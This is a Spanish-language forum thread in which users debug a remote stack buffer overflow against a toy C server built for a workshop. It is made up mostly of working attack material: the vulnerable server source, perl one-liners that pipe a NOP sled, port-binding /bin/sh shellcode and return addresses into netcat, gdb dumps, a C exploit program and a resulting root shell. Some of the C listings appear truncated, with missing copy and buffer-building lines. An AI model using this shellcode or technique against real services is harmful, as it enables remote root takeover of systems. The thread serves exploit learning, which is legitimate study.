Título: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 18 Febrero 2011, 01:10 am
Bueno, después de solucionar el último problema ( y colgarlo (http://foro.elhacker.net/seguridad/reto_adivina_por_que_no_funciona-t319811.0.html;msg1582131#new)) me he puesto a explotar el dichoso servidor de pruebas que he hecho para el taller. Os vuelvo a remitir el código... #include <sys/socket.h> #include <arpa/inet.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <time.h> int socketfd, newsocket; int vuln (char *trampa) { char buffer [100]; } void shutup (int signal) { times (); printf ("Shutting down...\n\n"); close (newsocket); close (socketfd); } int times () { struct tm *ahora; char buffer [40]; strftime (buffer , 40, "%d/%m/%Y %H:%M:%S" , ahora ); return 0; } int main (int argc, char *argv []) { struct tm *ahora; char hora [40]; strftime (hora , 40, "%d/%m/%Y %H:%M:%S" , ahora ); printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora ); if (getuid()!=0) { printf ("This proccess must be run by root.\n\n"); return 1; } if (argc<2) { printf ("Use: %s <PORT>\n\n", argv [0]); return 1; } int cont; struct sockaddr_in client, host; char buffer [1024]; int size=sizeof (client); socketfd=socket (2, 1 , 0); host.sin_family=AF_INET; host. sin_port=htons (atoi (argv [1])); host.sin_addr.s_addr=0; bind (socketfd, (struct sockaddr*)&host, sizeof (struct sockaddr)); listen (socketfd, 3); times (); printf ("Starting up...\n\n"); signal (SIGTERM, shutup); signal (SIGINT, shutup); while (1) { newsocket=accept (socketfd, (struct sockaddr*)&client, &size); times (); printf ("Got connection from %s:%d\n", inet_ntoa (client. sin_addr), ntohs (client. sin_port)); cont=recv (newsocket, &buffer, 1024, 0); while (cont>2) { times (); buffer [cont-1]='\0'; printf ("RECV %d bytes: %s\n", cont , buffer ); vuln (buffer); cont=recv (newsocket, &buffer, 1024, 0); } times (); printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client. sin_addr), ntohs (client. sin_port)); close (newsocket); } close (socketfd); return 0; }
Y os remito el comando que estoy usando para explotar el fallo... [8 nops + 92 shellcode + 4 ret + 1 null'] juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf" . "\x00"' | nc -vv localhost 5555555
El null lo pongo porque en la línea ... while (cont>2) { times (); --> buffer [cont-1]='\0'; printf ("RECV %d bytes: %s\n", cont , buffer );
... el último byte (se programó así por el \n de muchos clientes) se borra. El caso es que compilo sin ninguna protección... juanra@Juanra:~$ sudo gdb -q ./serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 01:05:14
18/02/2011 01:05:14 Starting up...
18/02/2011 01:05:21 Got connection from 127.0.0.1:45163
18/02/2011 01:05:21 RECV 113 bytes: ��������jfX�1�CRj�j���̀�jfXCRfhzifS��j�QV��̀�fCCSV��̀�fCRRV��̀�j�Y�?̀Iy��
Rh//shh/bin��R��S��̀������������
Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb) x/16x 0xbffff801
0xbffff801: 0x00000000 0x07000000 0x04000000 0x07000000
0xbffff811: 0x1c000000 0x10bffff8 0x02000000 0x00697a00
0xbffff821: 0x02000000 0x01000000 0x00000000 0xc4000000
0xbffff831: 0x00bffff7 0x5c000000 0x00bffff8 0xc4000000
(gdb) i r eip
eip 0xbffff801 0xbffff801
(gdb)
Fallo de segmentación al principio de la pila. Preguntas: ¿Por qué? ¿Cómo lo arreglo? Llevo toda la noche pensando, pero no se me ocurre nada... Qué puede ser? PD: Si os hace falta más información preguntadme. Gracias! Un saludo Sagrini
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: M3st4ng en 18 Febrero 2011, 21:07 pm
Hola! He probado tu código con una shellcode que tenia yo y me ha funcionado: SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 20:49:25
18/02/2011 20:49:25 Starting up...
18/02/2011 20:49:29 Got connection from 127.0.0.1:33672
18/02/2011 20:49:29 RECV 112 bytes: ���������������������������������������������������������^�1��F�F
�
����V
1ۉ�@̀�����/bin/sh�����������
process 3640 is executing new program: /bin/dash Me da la sensación de que no llegas a sobreescribir completamente el RET. Para hacer overflow necesitas 109 bytes y tu le estas pasando 104: $ perl -e 'print "A"x108' | nc -vv localhost 16005
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 20:53:00
18/02/2011 20:53:00 Starting up...
18/02/2011 20:53:16 Got connection from 127.0.0.1:54045
18/02/2011 20:53:16 RECV 108 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
Con 108 no llego a sobreescribir pero con 109 si: $ perl -e 'print "A"x109' | nc -vv localhost 16005
Starting program: /home/javi/programacion/pruebas/BOF_remoto/a.out 16005
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 20:58:36
18/02/2011 20:58:36 Starting up...
18/02/2011 20:58:43 Got connection from 127.0.0.1:39784
18/02/2011 20:58:43 RECV 109 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Revisa el comando que lanzas contra el servidor. Ahora voy a probar tu shellcode.
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 18 Febrero 2011, 21:29 pm
Hola Javi! Pues no sé, esta noche vuelvo a la carga :-\ ... ¿Te funciona con mi comando exacto? Sí, pero es que 100 buffer + 4 EBP + 4 ESP = 108 xD Luego hay que restarle cuatro pues al volver se restan cuatro bytes de la pila (ret). Finalmente... 104. Eso último me extraña, no sé de dónde sale este último byte... Ahh xD del buffer [cont-1]='\0';
No me había dado cuenta de que esto también me afectaba en ese ámbito... xD Gracias! Seguiré probando... PD: Esto es un code para ir preparando el taller, no el code que vamos a usar en el taller. Nadie es taaaan despistado jaja...
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: M3st4ng en 18 Febrero 2011, 21:40 pm
Hola de nuevo!
He probado tu shellcode aparte, sin usar ningún tipo de código vulnerable, y me da "violacion de segmento". ¿Puede que esté la shellcode mal? Intentaré buscar una que haga un bindshell y probaré a ver.
Saludos
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 18 Febrero 2011, 21:42 pm
Hola de nuevo!
He probado tu shellcode aparte, sin usar ningún tipo de código vulnerable, y me da "violacion de segmento". ¿Puede que esté la shellcode mal? Intentaré buscar una que haga un bindshell y probaré a ver.
Mmm, puede que la haya recortado mal, luego la miro, pero no es mía :P _________________________________________________________________________ Vale, modifico, un detallito... Al activar el randomize_va_space... juanra@Juanra:~$ sudo gdb -q serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 19/02/2011 13:09:38
19/02/2011 13:09:38 Starting up...
19/02/2011 13:09:41 Got connection from 127.0.0.1:46633
19/02/2011 13:09:41 RECV 113 bytes: ��������jfX�1�CRj�j���̀�jfXCRfhzifS��j�QV��̀�fCCSV��̀�fCRRV��̀�j�Y�?̀Iy��
Rh//shh/bin��R��S��̀������������
Program received signal SIGSEGV, Segmentation fault.
0xbffff7c4 in ?? ()
(gdb)
RET correcto. Y al desactivar... (gdb) r 31337
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 19/02/2011 13:10:53
19/02/2011 13:10:53 Starting up...
19/02/2011 13:10:56 Got connection from 127.0.0.1:60248
19/02/2011 13:10:56 RECV 113 bytes: ��������jfX�1�CRj�j���̀�jfXCRfhzifS��j�QV��̀�fCCSV��̀�fCRRV��̀�j�Y�?̀Iy��
Rh//shh/bin��R��S��̀������������
Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb)
Ambos corren así: juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf"x3 . "\x00"' | nc -vv localhost 31337
¿? Voy a mirar a ver la shellcode... _________________________________________________________________________ Modf: La shellcode va perfectamente :P
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: M3st4ng en 20 Febrero 2011, 21:47 pm
Hola! He estado todo el finde fuera y no me ha dado tiempo a mirar mucho. Lo que sí he hecho es reproducir el problema que tú tienes, parece que la shellcode se jode por algún motivo que aún no he descubierto. A priori todo el copiado del buffer lo hace bien:
0xbffff180: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff190: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1a0: 0x90909090 0x90909090 0x9958666a 0x5243db31
0xbffff1b0: 0x026a016a 0x80cde189 0x58666a96 0x68665243
0xbffff1c0: 0x5366697a 0x106ae189 0xe1895651 0x66b080cd
0xbffff1d0: 0x56534343 0x80cde189 0x524366b0 0xe1895652
0xbffff1e0: 0x6a9380cd 0x3fb05902 0x794980cd 0x520bb0f9
0xbffff1f0: 0x732f2f68 0x622f6868 0xe3896e69 0x53e28952
0xbffff200: 0x80cde189 0xbffff678 0xbffff1a0
Luego da un execepción y veo que la pila se ha modificado justo donde tengo la shellcode: 0xbffff180: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff190: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff1a0: 0x90909090 0x90909090 0x9958666a 0x5243db31
0xbffff1b0: 0x026a016a 0x80cde189 0x58666a96 0x68665243
0xbffff1c0: 0x5366697a 0x106ae189 0xe1895651 0x66b080cd
0xbffff1d0: 0x56534343 0x80cde189 0x524366b0 0x00000000
0xbffff1e0: 0x00000000 0x00000007 0x00000004 0x00000007
0xbffff1f0: 0xbffff1f8 0x00000010 0x697a0002 0x00000000
0xbffff200: 0x00000002 0x00000001 0x00000000 0xbffff200 Como se puede ver el EIP esta intentando ejecutar la instrucción que esta en la dir 0xbffff1dd. En esa dir habia código de nuestra shellcode que ha sido modificada. Program received signal SIGSEGV, Segmentation fault.
0xbffff1dd in ?? ()
(gdb) info r
eax 0x66 102
ecx 0xbffff1e4 -1073745436
edx 0x0 0
ebx 0x5 5
esp 0xbffff1dc 0xbffff1dc
ebp 0xbffff678 0xbffff678
esi 0x7 7
edi 0x0 0
eip 0xbffff1dd 0xbffff1dd
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
Seguirí investigando
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 21 Febrero 2011, 15:01 pm
El fallo creo que podría estar en la shellcode... Aunque no me sirva para este caso le voy a meter una local, a ver si se ejecuta xD
Si funciona es que el fallo está en la shellcode y listo...
Iré modificando xD
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 21 Febrero 2011, 19:39 pm
Perdonad el doble-post, pero... Lo conseguí!
En realidad era una tontería... \x00 se considera como byte nulo para strlen, por lo que no se contaba y me modificaba de todos modos una parte del exploit. Todo se solucionaba cambiando el byte nulo por cualquier otra cosa... xD xD xD
xD Ohh... Un detallito era que en el GDB me funciona, pero fuera no. Eso es que el ret me cambia al salir :P Ahora voy a meterle la buena shellcode y listo xD
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: M3st4ng en 21 Febrero 2011, 22:37 pm
Hola!
Pues a mi me sigue cascando. La shellcode que uso esta bien porque la he probado en local y funciona perfectamente. No entiendo por qué narices se me modifica la shellcode.....
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 21 Febrero 2011, 22:43 pm
A mi lo que me falla es mi shellcode. He hecho una que printa AAAA y funciona, ahora, la del remoto no va... Ahora voy a mirar el desensamblado a ver a qué amiguito llama :P
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 21 Febrero 2011, 23:21 pm
Perdona el doblepost, pero cuando consigues algo que quieres te motivas un puñado ;) Te explico... Servidorjuanra@Juanra:~/Escritorio/Serv$ sudo gdb -q serv
(gdb) r 31330
Starting program: /home/juanra/Escritorio/Serv/serv 31330
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 21/02/2011 23:16:53
21/02/2011 23:16:53 Starting up...
21/02/2011 23:17:00 Got connection from 127.0.0.1:43225
21/02/2011 23:17:00 RECV 109 bytes: ������������1�P@��P@P���f̀1�Rfh��CfS��j�QP���f̀@�D$�CC�f̀��
RRC�f̀��Ѱ?̀A���u�Rhn/shh//bi��RS���
juanra@Juanra:~$ perl -e 'print "\x90"x12 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x35\xf8\xff\xbf" . "\x90"' | hK vc 127.0.0.1 31330
hK 2.0 - By Sagrini (2010) - 21/02/2011 23:17:00
21/02/2011 23:17:00 Got connection with 127.0.0.1:31330
juanra@Juanra:~$
juanra@Juanra:~$ nc -vv localhost 5074
localhost [127.0.0.1] 5074 (?) open
whoami
root
groups
root
exit
sent 19, rcvd 10
juanra@Juanra:~$
12 NOPS + 92 SHELLCODE + 4 RET + 1 BASURA buffer [cont-1]='\0';
Lo que me fastidia es que sólo corre cuando abres el servidor desde GDB. Mañana lo miraré ::) Un saludo!
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: M3st4ng en 22 Febrero 2011, 00:21 am
Hola!! El tema de que no te funcione sin el "gdb" es porque la dirección que pones como salto a los NOPs no es la misma cuando corre el programa con el gdb que sin él. Tendrás que crear te una función que en tiempo de ejecución te dé un ESP al que le tengas que restar unos cuantos bytes para que caiga dentro de los NOPS. La función que yo uso es esta: unsigned get_esp(void)
{
__asm__("movl %esp, %eax");
} Con respecto al BOF remoto, mañana volvere a intentar otra cosa. Salu2!!
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 22 Febrero 2011, 00:37 am
Mmm, yo sencillamente modifico el código con un printf y listo xD :silbar: La cosa es que ahora se come la shellcode, la empieza por donde no es y me suelta "Instrucción ilegal". Ahora, en GDB gracias a los nops corre xD Seguiré mirando... _________________________________________________________ Modf: Vaya con la shellcode... Añado al codeint vuln (char *trampa) { char buffer [100]; printf ("Buffer [0x%08x] contains %s...\n", &buffer , buffer ); }
NCjuanra@Juanra:~$ nc -vv localhost 5074
localhost [127.0.0.1] 5074 (?) open
sent 0, rcvd 0
juanra@Juanra:~$
juanra@Juanra:~$ perl -e 'print "\x90"x12 . "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x28\xf8\xff\xbf" . "\x90"' | hK vc 127.0.0.1 31337
hK 2.0 - By Sagrini (2010) - 22/02/2011 01:04:25
22/02/2011 01:04:25 Got connection with 127.0.0.1:31337
juanra@Juanra:~$
juanra@Juanra:~/Escritorio/Serv$ sudo ./serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 22/02/2011 01:04:19
22/02/2011 01:04:19 Starting up...
22/02/2011 01:04:25 Got connection from 127.0.0.1:58332
22/02/2011 01:04:25 RECV 109 bytes: ������������1�P@��P@P���f̀1�Rfh��CfS��j�QP���f̀@�D$�CC�f̀��
RRC�f̀��Ѱ?̀A���u�Rhn/shh//bi��RS���
Fallo de segmentación
_________________________________________________________ Aparte, de pruebas... Serverjuanra@Juanra:~/Escritorio/Serv$ sudo ./serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 22/02/2011 01:13:49
22/02/2011 01:13:49 Starting up...
22/02/2011 01:13:51 Got connection from 127.0.0.1:50840
22/02/2011 01:13:51 RECV 109 bytes: ��������������������������������������������������������������������������������1���1Ҳ�jB��1�C̀1�1�@̀(���
Buffer [0xbffff824] contains ��������������������������������������������������������������������������������1���1Ҳ�jB��1�C̀1�1�@̀(���...
Bjuanra@Juanra:~/Escritorio/Serv$
juanra@Juanra:~$ perl -e 'print "\x90"x80 . "\x31\xc0\xb0\x04\x31\xd2\xb2\x01\x6a\x42\x89\xe1\x31\xdb\x43\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80" . "\x28\xf8\xff\xbf" . "\x90"' | hK vc 127.0.0.1 31337
hK 2.0 - By Sagrini (2010) - 22/02/2011 01:13:51
22/02/2011 01:13:51 Got connection with 127.0.0.1:31337
juanra@Juanra:~$
La shellcode sólo escribía una B y salía. Funciona a la perfección :P
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 2 Marzo 2011, 19:54 pm
Vale, ahora estaba pasando todo a limpio con una shellcode buena, y me ha salido este error al escribir el exploit... El fallo está en que me sobreescribe el RET con en el principio de la shellcode (9958666a == 0x6a 0x66 0x58 0x99 ...) ¿Qué le pasa? Serv#include <sys/socket.h> #include <arpa/inet.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <time.h> int sockfd, newsock; void shutup (int signal) { times (); printf ("Shutting down...\n\n"); close (newsock); close (sockfd); } int times () { struct tm *ahora; char buffer [40]; strftime (buffer , 40, "%d/%m/%Y %H:%M:%S" , ahora ); return 0; } int handle_conection (char *buffer) { char buff [256]; times (); printf ("[0x%08x]: %s\n", &buff , buff ); return 0; } int main (int argc, char *argv []) { struct tm *ahora; char hora [40]; strftime (hora , 40, "%d/%m/%Y %H:%M:%S" , ahora ); printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora ); if (getuid()!=0) { printf ("This proccess must be run by root.\n\n"); return 1; } if (argc<2) { printf ("Use: %s <PORT>\n\n", argv [0]); return 1; } int cont; struct sockaddr_in client, host; char buffer [1024]; int size=sizeof (client); sockfd=socket (2, 1 , 0); host.sin_family=AF_INET; host. sin_port=htons (atoi (argv [1])); host.sin_addr.s_addr=0; bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr)); listen (sockfd, 3); times (); printf ("Starting up...\n\n"); signal (SIGTERM, shutup); signal (SIGINT, shutup); while (1) { newsock=accept (sockfd, (struct sockaddr*)&client, &size); times (); printf ("Got connection from %s:%d\n", inet_ntoa (client. sin_addr), ntohs (client. sin_port)); cont=recv (newsock, &buffer, 1024, 0); while (cont > 1) { handle_conection (buffer); cont=recv (newsock, &buffer, 1024, 0); } times (); printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client. sin_addr), ntohs (client. sin_port)); close (newsock); } close (sockfd); return 0; }
Exploit#include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <sys/socket.h> int main (int argc, char *argv []) { printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n"); if (argc != 3) { printf ("!!! Use: %s <target_ip> <port>\n\n", argv [0]); return 1; } printf ("Creating socket...\t"); struct sockaddr_in host; int sockfd; host.sin_family = AF_INET; host. sin_port = htons (atoi (argv [2])); host.sin_addr.s_addr = inet_addr (argv [1]); if ((sockfd=socket (2, 1, 0))==-1) { return 1; } printf ("Conecting target...\t"); if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1) { return 1; } printf ("Creating buffer...\t"); char nops [168]; char shellcode [93] = "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58" "\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66" "\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a" "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"; char ret [6] = "\x30\xf8\xff\xbf\x90"; char command [265]; printf ("Sending buffer...\t"); if (send (sockfd , &command , strlen (command ), 0)==-1) { return 1; } FILE *fp = fopen ("a.txt", "w+"); printf ("Now you can exec NC [nc -vv localhost 5074]\nBe good!\n\n"); return 0; }
Root Shell1 GDB serv(gdb) r 31330
Starting program: /home/juanra/Escritorio/Serv/serv 31330
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 02/03/2011 19:50:08
02/03/2011 19:50:08 Starting up...
02/03/2011 19:50:11 Got connection from 127.0.0.1:41991
02/03/2011 19:50:11 [0xbffff6f8]: ������������������������������������������������������������������������������������������������������������������������������������������������������������������������jfX�1�CRj�j���̀�jfXCRfhzifS��j�QV��̀�fCCSV��̀�fCRRV��̀�j�Y�?̀Iy��
Rh//shh/bin��R��S��̀jfX�1�CRj�j���̀�jfXCRfhzifS��j�QV��̀�fCCSV��̀�fCRRV��̀�j�Y�?̀Iy��
Rh//shh/bin��R��S��̀0����n����������
�������(�跢%���y���y��(���1���1����y���y��(���1����������
Program received signal SIGSEGV, Segmentation fault.
0x9958666a in ?? ()
(gdb)
juanra@Juanra:~/Escritorio/Serv$ ./exploit 127.0.0.1 31330
Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net
Creating socket... [OK]
Conecting target... [OK]
Creating buffer... [OK]
Sending buffer... [OK]
Now you can exec NC [nc -vv localhost 5074]
Be good!
juanra@Juanra:~/Escritorio/Serv$
Gracias y un saludo! Sagrini
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: not-all0w3d en 21 Marzo 2011, 15:54 pm
Hay una extraña sensación en mi, que me indica sólo una cosa, el que no programa su propia shellcode, no está listo para solucionar todo tipo de problemas..
No he leído bien y replanteo la pregunta, ¿has hecho tú la shellcode?
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 21 Marzo 2011, 20:35 pm
Esta no, la he cogido de "Hacking, técnicas fundamentales", aunque está mal. Funciona, pero a veces da errores. Voy a ver si luego la puedo poner, lo más seguro es que no vaya... Reabro sesión y modif...
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: not-all0w3d en 21 Marzo 2011, 21:52 pm
Esta no, la he cogido de "Hacking, técnicas fundamentales", aunque está mal. Funciona, pero a veces da errores. Voy a ver si luego la puedo poner, lo más seguro es que no vaya... Reabro sesión y modif...
¡Qué mal!, te recomiendo que hagas tus propias shellcodes, yo sigo aprendiendo y me gusta esto de los overflows, y créeme es una batalla contra el Ollydbg (En mi caso).. Bueno espero que te funcione y ya ahí me pasas la shellcode para chequearla :)
Título: Re: ¿ Fallo BoF Remoto Linux ?
Publicado por: Garfield07 en 22 Marzo 2011, 18:07 pm
Sí, sólo que el nivel de complejidad de este tipo de shellcodes es algo más alto... Hago las mías propias para cosas pequeñas, pero una portbinding shell ya es otra cosa ;) Aún no me he animado a hacerla :-\ Aunque comparto tu opinión, esta shellcode era menos importante a que funcionase correctamente. Un detalle, para el que quiera que funcione cuando lo corras fuera del debugger, tienes que juntarse a su proceso. Os pongo el ejemplo: sagrini@sagrini:~/Escritorio/OverFlow/Cap2$ sudo ./serv 80 &
[1] 5166
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 22/03/2011 18:09:26
sagrini@sagrini:~/Escritorio/OverFlow/Cap2$ sudo gdb -q -pid=5166 --symbols=./serv
Attaching to process 5166
Load new symbol table from "/home/sagrini/Escritorio/OverFlow/Cap2/serv"? (y or n) y
0xb783d430 in __kernel_vsyscall ()
(gdb) c
Continuing.
22/03/2011 18:10:08 Got connection from 127.0.0.1:49484
Program received signal SIGSEGV, Segmentation fault.
0xb76f83c1 in getenv () from /lib/tls/i686/cmov/libc.so.6
(gdb) x/5000b $esp
[...]
0xbfe1a0b0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0c8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0d0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0d8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0e0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0e8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a0f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a100: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a108: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbfe1a110: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
[...]
(gdb)
---------------------------------------------------------
sagrini@sagrini:~$ perl -e 'print "A"x1040' | hK vc 127.0.0.1 80
hK 2.0 - By Sagrini (2010) - 22/03/2011 18:12:23
22/03/2011 18:12:23 Got connection with 127.0.0.1:80
Un saludo Sagrini
|